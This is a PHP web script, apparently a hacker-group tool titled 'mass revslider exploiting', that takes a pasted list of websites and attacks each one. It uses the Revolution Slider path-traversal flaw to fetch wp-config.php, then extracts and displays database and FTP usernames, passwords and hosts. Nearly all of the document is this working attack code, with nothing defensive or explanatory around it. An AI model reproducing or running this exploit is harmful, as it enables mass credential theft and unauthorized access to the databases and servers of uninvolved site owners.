mass rev teste1

1. <?php
2.  
3. print"
4.  
5. """"""""" "" "" -9-9999999 999999999 *** ** ********** amiral benz
6. "" """ """ """ -- 9 99 **** ** ********** G: to : ru cyber
7. """"""""" """""""" -9-9999999 99999999 ***** ** ***
8. "" """ "" "" -- 9 99 ** ** ** ***************
9. "" """ "" "" -9-9999999 99999999 ** *** ***************
10.  
11. ";
12.  
13.  
14. <body bgcolor="#000000" text="white">
15. <center>
16. <img src='http://im48.gulfup.com/FMwpOF.png' height="150" width="150"></img><br>
17. <font face='courier' color=red size='+1'>
18. mass revslider exploiting<br>by ThePrince MaGnoM<br>http://codersleet.com/</font><br>
19. <form method='post'>
20. <textarea name='sites' cols='50' rows='12'></textarea><br>
21. <input type='submit' name='go' value='get'>
22. </form>
23. <?php
24.  
25. function findit($mytext,$starttag,$endtag) {
26. $posLeft = stripos($mytext,$starttag)+strlen($starttag);
27. $posRight = stripos($mytext,$endtag,$posLeft+1);
28. return substr($mytext,$posLeft,$posRight-$posLeft);
29. }
30. error_reporting(0);
31. set_time_limit(0);
32. $ya=$_POST['go'];
33. $co=$_POST['sites'];
34.  
35. if($ya){
36. $e=explode("\r\n",$co);
37. foreach($e as $bda){
38. //echo '<br>'.$bda;
39. $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
40. $dn=($bda).($linkof);
41. $file=@file_get_contents($dn);
42. if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
43. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
44. echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
45. echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
46. echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
47. echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
48. echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
49. }
50. elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
51. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
52. echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
53. echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
54. echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
55. echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
56. }
57. else{echo "<center><font face='courier' color='yellow' >".$bda." ----> not infected </font></center>";}
58. echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
59. }
60.  
61. }
62.  
63. ?>